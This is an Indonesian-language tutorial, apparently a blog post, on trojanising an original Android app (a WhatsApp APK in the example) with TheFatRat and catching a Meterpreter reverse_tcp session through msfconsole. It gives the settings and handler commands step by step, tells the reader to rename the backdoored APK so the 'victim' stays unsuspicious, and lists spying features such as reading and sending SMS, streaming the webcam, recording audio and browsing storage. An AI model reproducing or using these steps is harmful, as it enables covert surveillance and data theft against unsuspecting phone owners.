memasukan backdoor di aplikasi android original via fatrat

hello friends,
saya akan menunjukan cara untuk menyisipkan backdoor ke dalam aplikasi android original.
jika belum terinstall fatrat di linux sobat, silahkan ikuti tutor dipost ini untuk menginstallnya.
sekarang langsung ketahap inject bacdoornya
buka tool fatrat

pilih angka 5 lalu enter

SET LHOST : isi dg ip local anda dg cara ketik ifconfig di terminal
SET LPORT : isi sesuai keinginan sobat, sbagai contoh saya isi 4444
locate original apk : isi dimana anda menyimpan file apk yg akan disusupkan backdor contohnya /root/Downloads/com.whatsapp-2.11.515-450271-minAPI7.apk
lalu tekan enter dan akan ada popups, disini saya akan memilih reverse_tcp.
klik ok.

jika berhasil proses decompile akan berjalan sprti gambar di bawah ini

  

 

 tunggu hingga proses finish, file akan tersimpan di folder /TheFatRat/output/(disini)

sekarang tinggal kirim backdoor.apk ke target, usahakan rename sesuai apk aslinya biar si korban tidak curiga.

jika sudah terinstall di smartphone korban tinggall eksekusi

buka terminal

ketik msfconsole

use exploit/multi/handler ENTER

set payload android/meterpreter/reverse_tcp ENTER

set lhost 192.168.1.10 (ip sesuaikan dg ip disaat proses backdoored tadi)

set lport 4444 (port isi dg port awal tadi)

exploit

 

 jika sikorban membuka app bacdoored tadi, otomatis anda akan masuk ke season meterpreter.

dan silahkan ketik help untuk melihat perintah yg tersedia.

banyak kok fitur yg tersedia, 

• membaca sms 
• kirim sms
• webcam stream
• capture camera
• rekam audio
• melihat isi sdcard dan internal
• dan masih banyak lainnya.

saya kira sampai disini saja, tunngu post berikutnya :D